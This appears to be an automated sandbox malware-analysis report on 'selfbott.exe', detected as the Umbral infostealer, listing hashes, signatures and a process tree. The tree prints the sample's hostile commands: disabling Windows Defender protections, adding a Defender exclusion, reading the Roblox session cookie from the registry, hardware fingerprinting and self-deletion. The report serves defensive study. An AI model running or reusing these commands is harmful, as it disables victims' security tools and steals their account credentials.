Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
30-11-2024 13:29
Behavioral task
behavioral1
Sample
selfbott.exe
Resource
win7-20240729-en
General
-
Target
selfbott.exe
-
Size
227KB
-
MD5
e8bf31ef50755a97e720a2272bc2d982
-
SHA1
7d99287c32962fcb643916817a1f97dde5eeb13b
-
SHA256
864825be054e1dd6ff62defe866c25c03961ef221975f386fe5385c8de6f8ce6
-
SHA512
27cf74d9f73677f449cc9bd80d3edaa99b12d8a225e067237caa616aaf85012925a13da3eb6512fbf762e0dc765f85fb76dc5fffe9eff9f7a3aab4733cd35d94
-
SSDEEP
6144:eloZM9rIkd8g+EtXHkv/iD49gXDR/k4XKG/BcoNgdb8e1m9i:IoZOL+EP89gXDR/k4XKG/BcoNAH
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2072-1-0x0000000001120000-0x0000000001160000-memory.dmp family_umbral -
Umbral family
-
pid Process 2844 powershell.exe 1744 powershell.exe 2248 powershell.exe 2488 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts selfbott.exe -
Deletes itself 1 IoCs
pid Process 1960 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1960 cmd.exe 2260 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1772 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2260 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2488 powershell.exe 2248 powershell.exe 2844 powershell.exe 2452 powershell.exe 1744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2072 selfbott.exe Token: SeDebugPrivilege 2488 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeIncreaseQuotaPrivilege 2816 wmic.exe Token: SeSecurityPrivilege 2816 wmic.exe Token: SeTakeOwnershipPrivilege 2816 wmic.exe Token: SeLoadDriverPrivilege 2816 wmic.exe Token: SeSystemProfilePrivilege 2816 wmic.exe Token: SeSystemtimePrivilege 2816 wmic.exe Token: SeProfSingleProcessPrivilege 2816 wmic.exe Token: SeIncBasePriorityPrivilege 2816 wmic.exe Token: SeCreatePagefilePrivilege 2816 wmic.exe Token: SeBackupPrivilege 2816 wmic.exe Token: SeRestorePrivilege 2816 wmic.exe Token: SeShutdownPrivilege 2816 wmic.exe Token: SeDebugPrivilege 2816 wmic.exe Token: SeSystemEnvironmentPrivilege 2816 wmic.exe Token: SeRemoteShutdownPrivilege 2816 wmic.exe Token: SeUndockPrivilege 2816 wmic.exe Token: SeManageVolumePrivilege 2816 wmic.exe Token: 33 2816 wmic.exe Token: 34 2816 wmic.exe Token: 35 2816 wmic.exe Token: SeIncreaseQuotaPrivilege 2816 wmic.exe Token: SeSecurityPrivilege 2816 wmic.exe Token: SeTakeOwnershipPrivilege 2816 wmic.exe Token: SeLoadDriverPrivilege 2816 wmic.exe Token: SeSystemProfilePrivilege 2816 wmic.exe Token: SeSystemtimePrivilege 2816 wmic.exe Token: SeProfSingleProcessPrivilege 2816 wmic.exe Token: SeIncBasePriorityPrivilege 2816 wmic.exe Token: SeCreatePagefilePrivilege 2816 wmic.exe Token: SeBackupPrivilege 2816 wmic.exe Token: SeRestorePrivilege 2816 wmic.exe Token: SeShutdownPrivilege 2816 wmic.exe Token: SeDebugPrivilege 2816 wmic.exe Token: SeSystemEnvironmentPrivilege 2816 wmic.exe Token: SeRemoteShutdownPrivilege 2816 wmic.exe Token: SeUndockPrivilege 2816 wmic.exe Token: SeManageVolumePrivilege 2816 wmic.exe Token: 33 2816 wmic.exe Token: 34 2816 wmic.exe Token: 35 2816 wmic.exe Token: SeIncreaseQuotaPrivilege 1340 wmic.exe Token: SeSecurityPrivilege 1340 wmic.exe Token: SeTakeOwnershipPrivilege 1340 wmic.exe Token: SeLoadDriverPrivilege 1340 wmic.exe Token: SeSystemProfilePrivilege 1340 wmic.exe Token: SeSystemtimePrivilege 1340 wmic.exe Token: SeProfSingleProcessPrivilege 1340 wmic.exe Token: SeIncBasePriorityPrivilege 1340 wmic.exe Token: SeCreatePagefilePrivilege 1340 wmic.exe Token: SeBackupPrivilege 1340 wmic.exe Token: SeRestorePrivilege 1340 wmic.exe Token: SeShutdownPrivilege 1340 wmic.exe Token: SeDebugPrivilege 1340 wmic.exe Token: SeSystemEnvironmentPrivilege 1340 wmic.exe Token: SeRemoteShutdownPrivilege 1340 wmic.exe Token: SeUndockPrivilege 1340 wmic.exe Token: SeManageVolumePrivilege 1340 wmic.exe Token: 33 1340 wmic.exe Token: 34 1340 wmic.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2072 wrote to memory of 2268 2072 selfbott.exe 30 PID 2072 wrote to memory of 2268 2072 selfbott.exe 30 PID 2072 wrote to memory of 2268 2072 selfbott.exe 30 PID 2072 wrote to memory of 2488 2072 selfbott.exe 32 PID 2072 wrote to memory of 2488 2072 selfbott.exe 32 PID 2072 wrote to memory of 2488 2072 selfbott.exe 32 PID 2072 wrote to memory of 2248 2072 selfbott.exe 34 PID 2072 wrote to memory of 2248 2072 selfbott.exe 34 PID 2072 wrote to memory of 2248 2072 selfbott.exe 34 PID 2072 wrote to memory of 2844 2072 selfbott.exe 36 PID 2072 wrote to memory of 2844 2072 selfbott.exe 36 PID 2072 wrote to memory of 2844 2072 selfbott.exe 36 PID 2072 wrote to memory of 2452 2072 selfbott.exe 38 PID 2072 wrote to memory of 2452 2072 selfbott.exe 38 PID 2072 wrote to memory of 2452 2072 selfbott.exe 38 PID 2072 wrote to memory of 2816 2072 selfbott.exe 40 PID 2072 wrote to memory of 2816 2072 selfbott.exe 40 PID 2072 wrote to memory of 2816 2072 selfbott.exe 40 PID 2072 wrote to memory of 1340 2072 selfbott.exe 43 PID 2072 wrote to memory of 1340 2072 selfbott.exe 43 PID 2072 wrote to memory of 1340 2072 selfbott.exe 43 PID 2072 wrote to memory of 668 2072 selfbott.exe 45 PID 2072 wrote to memory of 668 2072 selfbott.exe 45 PID 2072 wrote to memory of 668 2072 selfbott.exe 45 PID 2072 wrote to memory of 1744 2072 selfbott.exe 47 PID 2072 wrote to memory of 1744 2072 selfbott.exe 47 PID 2072 wrote to memory of 1744 2072 selfbott.exe 47 PID 2072 wrote to memory of 1772 2072 selfbott.exe 49 PID 2072 wrote to memory of 1772 2072 selfbott.exe 49 PID 2072 wrote to memory of 1772 2072 selfbott.exe 49 PID 2072 wrote to memory of 1960 2072 selfbott.exe 51 PID 2072 wrote to memory of 1960 2072 selfbott.exe 51 PID 2072 wrote to memory of 1960 2072 selfbott.exe 51 PID 1960 wrote to memory of 2260 1960 cmd.exe 53 PID 1960 wrote to memory of 2260 1960 cmd.exe 53 PID 1960 wrote to memory of 2260 1960 cmd.exe 53 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2268 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\selfbott.exe"C:\Users\Admin\AppData\Local\Temp\selfbott.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\selfbott.exe"2⤵
- Views/modifies file attributes
PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\selfbott.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1340
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1744
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1772
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\selfbott.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2260
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5dbec8d69e3bdaf738d20b10032cd6d4d
SHA1a4af1d14861b32e7019ff77f47b512526b49417c
SHA2565630c11a6c6f350dd37ebd0e5828a9346b227949e5e827b4add66ee5e364a8ce
SHA512be5d34e5d9da8731bb41e0132f56c1220c8b5388a433658539fa18c94747bd12c6023e1b8a7774fcbfa973f0541f49006042f1f012444c1044c42f6af44b9cd6